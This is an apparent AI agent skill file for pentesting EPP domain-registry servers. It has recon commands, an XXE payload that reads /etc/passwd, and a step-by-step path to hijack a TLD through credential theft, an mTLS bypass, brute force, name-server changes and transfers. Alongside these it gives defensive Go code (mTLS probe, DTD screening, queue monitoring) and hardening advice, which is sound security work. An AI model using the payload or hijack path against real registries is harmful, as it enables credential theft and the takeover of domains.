Hacktricks-skills epp-pentesting

Pentest EPP (Extensible Provisioning Protocol) servers used for domain name management. Use this skill whenever the user mentions EPP, domain registrar testing, port 700, TLD security, registry vulnerabilities, or wants to assess domain name system infrastructure. This skill covers enumeration, XXE/SSRF exploitation, mTLS bypass testing, and domain hijacking attack paths.

install

Clone the upstream repo:

```bash
git clone https://github.com/abelrguezr/hacktricks-skills
```

manifest: skills/network-services-pentesting/700-pentesting-epp/SKILL.MD

source content

EPP Pentesting Skill

A comprehensive guide for security testing of Extensible Provisioning Protocol (EPP) servers used by domain name registries and registrars.

What is EPP?

The Extensible Provisioning Protocol (EPP) is a network protocol used for management of domain names and other internet resources by domain name registries and registrars. It enables automation of domain name registration, renewal, transfer, and deletion processes.

Key characteristics:

  • Typically listens on TCP port 700 over TLS
  • Uses XML for communication (XXE vulnerability surface)
  • Often implements mutual-TLS (mTLS) for client authentication
  • Used by TLD registries to communicate with domain registrars

Enumeration & Reconnaissance

Step 1: Discover EPP Endpoints

EPP servers are often hidden behind generic hostnames like `ot&e.<tld>.nic.<cc>`. Start with port scanning:

```bash
# Scan for EPP port
nmap -p700 <target>

# Banner-grabbing and TLS inspection
nmap -p700 --script ssl-cert,ssl-enum-ciphers <target>
```

Step 2: Check mTLS Requirements

Many private test or pre-production deployments forget to enforce mTLS:

```bash
# Check if mTLS is really required (it frequently is not!)
openssl s_client -connect <target>:700 -quiet \
  -servername epp.test 2>/dev/null | head
```

If the server does not terminate the connection after the TLS handshake, you can attempt to send an unauthenticated `<hello/>` message. Over TCP every EPP data unit is preceded by a 4-byte big-endian length that counts the header itself (RFC 5734), so the XML below has to be framed that way rather than pasted raw into `s_client`:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
  <hello/>
</epp>
```
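The check in Step 2 and the "Enforce mTLS" item in the hardening list are two sides of the same setting. The following Go program is an added example, not code from the skill or from any EPP project: it starts two loopback TLS listeners, one with `tls.NoClientCert` (the deployment that forgot to enforce mTLS) and one with `tls.RequireAndVerifyClientCert`, then connects to each without a client certificate and reports whether an EPP greeting comes back. The certificate, the `epp.test` name and the greeting body are constructed for the example; a real registry would use a separate CA for registrar client certificates.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/tls"
	"crypto/x509"
	"encoding/binary"
	"fmt"
	"io"
	"math/big"
	"time"
)

// Constructed stand-in for the RFC 5730 <greeting>; only its presence matters here.
const greeting = `<?xml version="1.0" encoding="UTF-8"?><epp xmlns="urn:ietf:params:xml:ns:epp-1.0"><greeting><svID>probe-lab</svID></greeting></epp>`

// Policies under test: the misconfiguration from Step 2 and the hardened setting.
var policies = map[string]tls.ClientAuthType{"lax": tls.NoClientCert, "strict": tls.RequireAndVerifyClientCert}

// testCert builds a throwaway self-signed certificate for epp.test (test-only);
// the same cert acts as the registry CA, so the pool also serves as ClientCAs.
func testCert() (tls.Certificate, *x509.CertPool) {
	key, _ := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	tmpl := &x509.Certificate{
		SerialNumber:          big.NewInt(1),
		DNSNames:              []string{"epp.test"},
		NotBefore:             time.Now().Add(-time.Hour),
		NotAfter:              time.Now().Add(time.Hour),
		KeyUsage:              x509.KeyUsageDigitalSignature | x509.KeyUsageCertSign,
		ExtKeyUsage:           []x509.ExtKeyUsage{x509.ExtKeyUsageServerAuth},
		BasicConstraintsValid: true,
		IsCA:                  true,
	}
	der, err := x509.CreateCertificate(rand.Reader, tmpl, tmpl, &key.PublicKey, key)
	if err != nil {
		panic(err)
	}
	leaf, _ := x509.ParseCertificate(der)
	pool := x509.NewCertPool()
	pool.AddCert(leaf)
	return tls.Certificate{Certificate: [][]byte{der}, PrivateKey: key, Leaf: leaf}, pool
}

// StartRegistry listens on a loopback port with the given client-auth policy and serves
// one connection: handshake, then a length-prefixed greeting (RFC 5734 framing).
// With RequireAndVerifyClientCert a certificate-less client fails the handshake first.
func StartRegistry(cert tls.Certificate, clientCAs *x509.CertPool, policy tls.ClientAuthType) (string, error) {
	cfg := &tls.Config{Certificates: []tls.Certificate{cert}, ClientAuth: policy, ClientCAs: clientCAs}
	ln, err := tls.Listen("tcp", "127.0.0.1:0", cfg)
	if err != nil {
		return "", err
	}
	go func() {
		c, err := ln.Accept()
		if err != nil {
			return
		}
		defer c.Close()
		if err := c.(*tls.Conn).Handshake(); err != nil {
			return // no client cert under the strict policy: alert sent, no greeting
		}
		msg := make([]byte, 4+len(greeting))
		binary.BigEndian.PutUint32(msg, uint32(len(msg))) // total length, header included
		copy(msg[4:], greeting)
		c.Write(msg)
	}()
	return ln.Addr().String(), nil
}

// ProbeClientAuth connects WITHOUT a client certificate and reports whether the
// server still hands out its greeting (enforced == false means mTLS is not enforced).
func ProbeClientAuth(addr string, roots *x509.CertPool) (enforced bool, detail string) {
	conn, err := tls.Dial("tcp", addr, &tls.Config{RootCAs: roots, ServerName: "epp.test"})
	if err != nil {
		return true, "handshake rejected: " + err.Error() // TLS 1.2 servers alert inside the handshake
	}
	defer conn.Close()
	conn.SetReadDeadline(time.Now().Add(2 * time.Second))
	var hdr [4]byte
	_, err = io.ReadFull(conn, hdr[:])
	n := binary.BigEndian.Uint32(hdr[:])
	if err != nil || n < 4 {
		return true, fmt.Sprintf("no greeting after handshake (err=%v, len=%d)", err, n) // TLS 1.3: alert on first read
	}
	body := make([]byte, n-4)
	_, err = io.ReadFull(conn, body)
	return err != nil, fmt.Sprintf("greeting frame of %d bytes served to anonymous client (err=%v)", len(body), err)
}

func main() {
	cert, pool := testCert()
	for name, policy := range policies {
		addr, _ := StartRegistry(cert, pool, policy)
		enforced, detail := ProbeClientAuth(addr, pool)
		fmt.Printf("%-6s mTLS enforced=%v: %s\n", name, enforced, detail)
	}
}
```

The probe deliberately reads after the handshake instead of trusting `tls.Dial` alone: under TLS 1.3 the client's handshake completes before the server has verified the (absent) client certificate, so a strict server only reveals itself by closing the connection on the first read, which is exactly why the `openssl s_client` check above looks for a greeting rather than a handshake error.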

Step 3: Use Automated Tools

Recommended open-source clients:

  1. epp-client (Go) – Actively maintained, supports TCP/TLS and EPP-over-HTTPS (RFC 8730):

     ```bash
     go install github.com/domainr/epp/cmd/epp@latest
     ```

  2. gandi/go-epp – Minimal client library for fuzzing or nuclei-style workflows

  3. afq984/php-epp-client – PHP implementation used by many small registrars

Common Vulnerabilities (2023-2025)

| Year | Component | CWE | Impact |
|------|-----------|-----|--------|
| 2023 | CoCCA Registry < 3.5 | CWE-611 XXE | Remote file read & SSRF via crafted `<epp>` payload |
| 2024 | FRED EPP Server 2.x | CWE-322 Insufficient TLS cert validation | Bypass of mTLS allowed unauthorized registrar login |
| 2025 | Proprietary registrar panel | CWE-306 Missing Authentication for Critical Function | Domain transfer approval endpoint exposed over EPP-HTTP bridge |

XXE / SSRF Exploitation

EPP uses XML, making it vulnerable to XXE when parsers are misconfigured. This payload works against many Java/Spring implementations:

```xml
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<epp xmlns="urn:ietf:params:xml:ns:epp-1.0">
  <command>
    <check>
      <domain:check xmlns:domain="urn:ietf:params:xml:ns:domain-1.0">
        <domain:name>&xxe;</domain:name>
      </domain:check>
    </check>
  </command>
</epp>
```

When the parser is misconfigured (`XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES=true`), the file content is returned inside the `<resData>` structure.
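The registry-side fix is not only a parser flag (the "secure-processing" item in the hardening list) but a rule that can be enforced before any parser flag matters: legitimate EPP never carries a DTD, so a frame containing `<!DOCTYPE` or `<!ENTITY` can be refused outright. The Go code below is an added example, not part of the skill or of any registry software. It reads RFC 5734 length-prefixed frames with a size cap, screens each frame for DTD directives using `encoding/xml`'s token stream, and only then extracts the `<domain:name>` values of a `<check>` command. The two sample frames are constructed: a benign check for `example.test`/`example2.test`, and the XXE probe shown above.

```go
package main

import (
	"bytes"
	"encoding/binary"
	"encoding/xml"
	"fmt"
	"io"
)

const domainNS = "urn:ietf:params:xml:ns:domain-1.0"

// MaxFrame caps one EPP data unit so a forged length header cannot make the
// registry allocate an arbitrarily large buffer.
const MaxFrame = 1 << 20

// Constructed samples: a benign <domain:check> and the XXE probe shown above.
const benignCheck = `<?xml version="1.0" encoding="UTF-8"?><epp xmlns="urn:ietf:params:xml:ns:epp-1.0"><command><check>
<domain:check xmlns:domain="urn:ietf:params:xml:ns:domain-1.0"><domain:name>example.test</domain:name><domain:name>example2.test</domain:name></domain:check>
</check><clTRID>probe-001</clTRID></command></epp>`

const xxeCheck = `<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<epp xmlns="urn:ietf:params:xml:ns:epp-1.0"><command><check><domain:check xmlns:domain="urn:ietf:params:xml:ns:domain-1.0">
<domain:name>&xxe;</domain:name></domain:check></check></command></epp>`

// ReadFrame reads one RFC 5734 data unit: a 4-byte big-endian total length
// (header included) followed by the XML document.
func ReadFrame(r io.Reader) ([]byte, error) {
	var hdr [4]byte
	if _, err := io.ReadFull(r, hdr[:]); err != nil {
		return nil, err
	}
	n := binary.BigEndian.Uint32(hdr[:])
	if n < 4 || n > MaxFrame {
		return nil, fmt.Errorf("refusing frame with declared length %d", n)
	}
	body := make([]byte, n-4)
	if _, err := io.ReadFull(r, body); err != nil {
		return nil, err
	}
	return body, nil
}

// ScreenFrame tokenizes the document before any object-level decoding and
// rejects <!DOCTYPE>/<!ENTITY> declarations outright. Legitimate EPP never
// carries a DTD, so a directive is an XXE attempt or a broken client either way.
func ScreenFrame(body []byte) error {
	dec := xml.NewDecoder(bytes.NewReader(body))
	dec.Strict = true // the default; it also makes undefined references such as &xxe; errors
	for {
		tok, err := dec.Token()
		if err == io.EOF {
			return nil
		}
		if err != nil {
			return fmt.Errorf("malformed frame: %w", err)
		}
		if d, ok := tok.(xml.Directive); ok {
			return fmt.Errorf("DTD directive rejected: <!%.20s...>", string(d))
		}
	}
}

// CheckNames returns the names queried by a <domain:check>, after screening.
// Only elements in the genuine domain-1.0 namespace count, not lookalikes.
func CheckNames(body []byte) ([]string, error) {
	if err := ScreenFrame(body); err != nil {
		return nil, err
	}
	dec := xml.NewDecoder(bytes.NewReader(body))
	var names []string
	inName := false
	for {
		tok, err := dec.Token()
		if err == io.EOF {
			return names, nil
		}
		if err != nil {
			return nil, err
		}
		switch t := tok.(type) {
		case xml.StartElement:
			inName = t.Name.Space == domainNS && t.Name.Local == "name"
		case xml.CharData:
			if inName {
				names = append(names, string(t))
			}
		case xml.EndElement:
			inName = false
		}
	}
}

func main() {
	for _, f := range []string{benignCheck, xxeCheck} {
		names, err := CheckNames([]byte(f))
		fmt.Printf("names=%v err=%v\n", names, err)
	}
}
```

Go's `encoding/xml` never fetches external entities, so the XXE payload itself is inert against this code; the point of `ScreenFrame` is that the same pre-parse rejection can sit in front of a Java/StAX or libxml2 based registry, where the parser flags named above decide whether `file:///etc/passwd` is read. The length cap in `ReadFrame` addresses the other parser-facing problem on port 700: a client-supplied 32-bit length that is honoured blindly.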

Other Typical Findings

  1. Weak credential policy – EPP login passphrases shorter than 8 characters; brute-force is often feasible because the spec only RECOMMENDS (not requires) rate-limiting

  2. Missing `registryLock` / `serverUpdateProhibited` status – Once authenticated, attackers can immediately update NS records and steal traffic

  3. Unsigned poll messages – Some implementations still do not sign poll Q&A messages, enabling spoofing/phishing of registrar operators

Attack Path: From Zero to TLD Hijack

Follow this methodology for comprehensive EPP assessment:

  1. Discover an EPP endpoint (often hidden behind a generic host like `ot&e.<tld>.nic.<cc>`)

  2. Abuse weaknesses to gain registrar-level credentials:

    • XXE → SSRF to IMDSv1, credential exfiltration
    • TLS-bypass if mTLS is not enforced
    • Brute-force weak credentials

  3. Issue `<update>` requests to change the domain's `hostObj` records to attacker-controlled name servers

  4. Submit `<transfer>` to move the domain to an attacker-controlled registrar – many registries still rely on a single auth-code

  5. Profit: Full control of DNS zone, ability to request TLS certificates via ACME

Defensive Measures & Hardening

When providing remediation guidance, recommend:

  • Enforce mTLS with per-registrar client certificates and pin the registry CA
  • Set `parserFeature secure-processing=true` or equivalent to kill XXE
  • Run continuous fuzzing of the XML parser (e.g., with `go-fuzz` or `jazzer` for Java)
  • Deploy Registry Lock / server*Prohibited statuses for high-value domains
  • Monitor the `poll` queue for suspicious `<transfer>` or `<update>` commands and alert in real-time
  • Leverage ICANN 2024 DNS-Abuse contract amendments requiring registries to prove rate-limit & auth controls
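The "monitor the poll queue" and "Registry Lock" items above combine naturally: a transfer or delegation change on a locked domain should never reach the queue at all, so seeing one is itself a finding. The Go program below is an added example, not code from the skill or from any registry: it decodes a batch of command frames with `encoding/xml` path tags, surfaces `<transfer op="request|approve">` and any `<update>` that adds or removes `hostObj` name servers, and escalates anything that touches a domain in the locked set. The four queued frames and the names `victim.test`, `example.test` and `ns1.rogue.test` are constructed for the example; a real deployment would feed it the registry's command log or poll queue.

```go
package main

import (
	"encoding/xml"
	"fmt"
)

// queuedCommand mirrors just enough of an RFC 5730/5731 command frame to spot
// delegation and ownership changes. encoding/xml matches path elements by local
// name, so the domain: prefix needs no special handling.
type queuedCommand struct {
	XMLName  xml.Name `xml:"urn:ietf:params:xml:ns:epp-1.0 epp"`
	ClTRID   string   `xml:"command>clTRID"`
	Transfer *struct {
		Op   string `xml:"op,attr"`
		Name string `xml:"transfer>name"`
	} `xml:"command>transfer"`
	Update *struct {
		Name  string   `xml:"update>name"`
		AddNS []string `xml:"update>add>ns>hostObj"`
		RemNS []string `xml:"update>rem>ns>hostObj"`
	} `xml:"command>update"`
}

// Alert is one queue entry worth a human's attention.
type Alert struct {
	ClTRID, Domain, Reason string
}

// ReviewQueue applies the monitoring rule from the hardening list: transfer
// requests/approvals and name-server changes are always surfaced, and any
// update or transfer touching a Registry-Locked domain is escalated, because
// serverUpdateProhibited/serverTransferProhibited should have blocked it first.
func ReviewQueue(frames []string, locked map[string]bool) ([]Alert, error) {
	var alerts []Alert
	for _, f := range frames {
		var c queuedCommand
		if err := xml.Unmarshal([]byte(f), &c); err != nil {
			return nil, fmt.Errorf("undecodable frame: %w", err)
		}
		var domain, reason string
		switch {
		case c.Transfer != nil:
			domain = c.Transfer.Name
			if c.Transfer.Op == "request" || c.Transfer.Op == "approve" {
				reason = "transfer " + c.Transfer.Op
			}
		case c.Update != nil:
			domain = c.Update.Name
			if len(c.Update.AddNS)+len(c.Update.RemNS) > 0 {
				reason = fmt.Sprintf("delegation change +%v -%v", c.Update.AddNS, c.Update.RemNS)
			}
		default:
			continue // check/info/poll and the like change nothing
		}
		if locked[domain] {
			if reason == "" {
				reason = "update"
			}
			reason = "LOCKED domain reached the queue (server*Prohibited missing?): " + reason
		}
		if reason != "" {
			alerts = append(alerts, Alert{c.ClTRID, domain, reason})
		}
	}
	return alerts, nil
}

// Constructed sample queue: a harmless check, a transfer request, a delegation
// change on a locked domain, and a contact-only update that should stay quiet.
var sampleQueue = []string{
	`<epp xmlns="urn:ietf:params:xml:ns:epp-1.0"><command><check><domain:check xmlns:domain="urn:ietf:params:xml:ns:domain-1.0">
<domain:name>example.test</domain:name></domain:check></check><clTRID>Q-001</clTRID></command></epp>`,
	`<epp xmlns="urn:ietf:params:xml:ns:epp-1.0"><command><transfer op="request"><domain:transfer xmlns:domain="urn:ietf:params:xml:ns:domain-1.0">
<domain:name>victim.test</domain:name><domain:authInfo><domain:pw>[redacted]</domain:pw></domain:authInfo>
</domain:transfer></transfer><clTRID>Q-002</clTRID></command></epp>`,
	`<epp xmlns="urn:ietf:params:xml:ns:epp-1.0"><command><update><domain:update xmlns:domain="urn:ietf:params:xml:ns:domain-1.0">
<domain:name>example.test</domain:name>
<domain:add><domain:ns><domain:hostObj>ns1.rogue.test</domain:hostObj></domain:ns></domain:add>
<domain:rem><domain:ns><domain:hostObj>ns1.example.test</domain:hostObj></domain:ns></domain:rem>
</domain:update></update><clTRID>Q-003</clTRID></command></epp>`,
	`<epp xmlns="urn:ietf:params:xml:ns:epp-1.0"><command><update><domain:update xmlns:domain="urn:ietf:params:xml:ns:domain-1.0">
<domain:name>victim.test</domain:name><domain:chg><domain:registrant>sh8013</domain:registrant></domain:chg>
</domain:update></update><clTRID>Q-004</clTRID></command></epp>`,
}

func main() {
	alerts, err := ReviewQueue(sampleQueue, map[string]bool{"example.test": true})
	if err != nil {
		panic(err)
	}
	for _, a := range alerts {
		fmt.Printf("%s %s: %s\n", a.ClTRID, a.Domain, a.Reason)
	}
}
```

The `clTRID` is carried into every alert because it is the registrar-side transaction id: it is what the operator quotes back to the registrar when asking whether the command was intended, and it is the key that joins the queue entry to the registrar's own audit log.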

References

  • ICANN Security and Stability Advisory Committee (SSAC). "SAC118: Consequences of Registry Operator Failure to Implement EPP Security Controls". 2024.
  • HackCompute – "Hacking EPP servers: abusing XXE to hijack TLDs" (2023).
  • RFC 5730 – Extensible Provisioning Protocol (EPP)
  • RFC 8730 – EPP over HTTPS

Scripts

Use the bundled scripts for common tasks:

  • `scripts/epp-enumerate.sh` – Banner grabbing and TLS inspection
  • `scripts/epp-xxe-test.sh` – Test for XXE vulnerabilities
  • `scripts/epp-login-test.go` – Minimal login+check script for testing authentication